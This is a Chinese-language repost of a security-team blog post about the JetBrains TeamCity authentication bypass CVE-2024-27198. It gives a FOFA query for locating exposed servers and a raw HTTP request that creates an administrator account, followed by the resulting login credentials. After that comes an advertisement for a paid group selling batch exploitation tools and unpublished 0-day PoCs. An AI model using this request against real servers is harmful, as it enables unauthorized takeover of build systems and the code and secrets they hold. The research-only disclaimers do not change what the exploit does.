JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]

admin

138899
文章

114
评论

2024年3月20日01:51:07评论52 views字数 859阅读2分51秒阅读模式

【JetBrains TeamCity 身份验证绕过[CVE-2024-27198]】

JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]

资产测绘

FOFA: body="Log in to TeamCity"

JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]

数据请求包

POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1Host: youipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: */*Content-Type: application/jsonAccept-Encoding: gzip, deflate

JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]

访问地址

使用账号密码qqwweerr1/qqwweerr登录系统

‍

JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]

漏洞利用

JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]

圈子介绍

【圈子介绍】

高质量漏洞利用工具分享社区，每天至少更新一个0Day/Nday/1day及对应漏洞的批量利用工具，团队内部POC分享，星球不定时更新内外网攻防渗透技巧以及最新学习研究成果等。分享行业最新资讯，交流解答各类技术问题

【圈子服务】

1，一年至少365+漏洞Poc及对应漏洞批量利用工具

2，24HVV内推途径（直面厂商）

3，Fofa高级会员api及各种漏洞利用工具及后续更新，渗透工具、文档资源分享

4，内部漏洞库情报分享（目前已有850+poc，会定期更新，包括部分未公开0/1day）

5，加入内部微信群，认识更多的行业朋友（群里有100+C**D通用证书师傅），遇到任何技术问题都可以进行快速提问、讨论交流；

圈子目前价格为59元(交个朋友啦！)，现在星球有近300+位师傅相信选择加入我们圈子，圈子每天都会更新内容。

JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]

圈子收集近期LD库

JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]

免责声明

文章所涉及内容，仅供安全研究与教学之用，由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。

原文始发于微信公众号（银遁安全团队）：JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]

【风险通告】PyTorch存在远程代码执行漏洞（CVE-2025-32434）

PyTorch 中存在严重的RCE漏洞

CVE-2025-22457：基于堆栈的远程缓冲区溢出的POC验证脚本

Kubernetes CVE-2025-1974 RCE POC

CVE-2025-27218｜Sitecore CMS远程代码执行漏洞

CentreStack 反序列化漏洞 (CVE-2025-30406)

Windows提权漏洞CVE-2025-21204

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

发表评论

在线咨询

微信